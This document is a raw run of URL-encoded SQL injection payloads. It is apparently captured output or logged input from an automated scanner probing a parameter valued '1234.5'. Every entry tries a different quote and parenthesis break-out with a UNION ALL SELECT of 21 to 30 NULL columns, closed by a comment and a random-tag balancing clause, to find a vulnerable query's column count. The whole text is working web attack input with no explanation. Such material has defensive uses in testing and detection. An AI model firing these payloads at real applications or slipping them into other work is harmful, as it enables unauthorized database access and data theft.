1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27DDiX%27%20LIKE%20%27DDiX 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27WXGr%27%20LIKE%20%27WXGr 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27wHGn%27%20LIKE%20%27wHGn 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27CTQz%27%20LIKE%20%27CTQz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27WtNx%27%20LIKE%20%27WtNx 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27pFbt%27%20LIKE%20%27pFbt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27zzLH%27%20LIKE%20%27zzLH 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27PptV%27%20LIKE%20%27PptV 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27SlWy%27%20LIKE%20%27SlWy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27AOjP%27%20LIKE%20%27AOjP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Jvjp%27%20LIKE%20%27Jvjp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27jUAl%27%20LIKE%20%27jUAl 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27iyLs%27%20LIKE%20%27iyLs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27SAAS%27%20LIKE%20%27SAAS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Jddq%27%20LIKE%20%27Jddq 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27rtLs%27%20LIKE%20%27rtLs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27dzgq%27%20LIKE%20%27dzgq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AcyO%22%3D%22AcyO 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WKjB%22%3D%22WKjB 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22uNPl%22%3D%22uNPl 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JlQE%22%3D%22JlQE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GaDw%22%3D%22GaDw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xxeD%22%3D%22xxeD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22fadX%22%3D%22fadX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22TTtH%22%3D%22TTtH 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JjWF%22%3D%22JjWF 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22lXyd%22%3D%22lXyd 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mzGb%22%3D%22mzGb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22QDqd%22%3D%22QDqd 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22jXEI%22%3D%22jXEI 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HyKu%22%3D%22HyKu 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Ebmh%22%3D%22Ebmh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22tPkT%22%3D%22tPkT 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xvrc%22%3D%22xvrc 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Jnaw%22%3D%22Jnaw 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22YWnb%22%3D%22YWnb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HRSN%22%3D%22HRSN 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22qJwy%22%3D%22qJwy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22gjor%22%3D%22gjor 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22XnsH%22%3D%22XnsH 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22xkUJ%22%3D%22xkUJ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22DHcm%22%3D%22DHcm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22qPwi%22%3D%22qPwi 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Iehl%22%3D%22Iehl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22hsIV%22%3D%22hsIV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22bJiY%22%3D%22bJiY 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22bxaS%22%3D%22bxaS 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22qqyl%22%3D%22qqyl 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IsSF%22%3D%22IsSF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22qnbA%22%3D%22qnbA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22eYbW%22%3D%22eYbW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22iAxN%22%3D%22iAxN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22fgnN%22%3D%22fgnN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Hpci%22%3D%22Hpci 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sRah%22%3D%22sRah 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22RVci%22%3D%22RVci 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22VBFt%22%3D%22VBFt 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JgGh%22%20LIKE%20%22JgGh 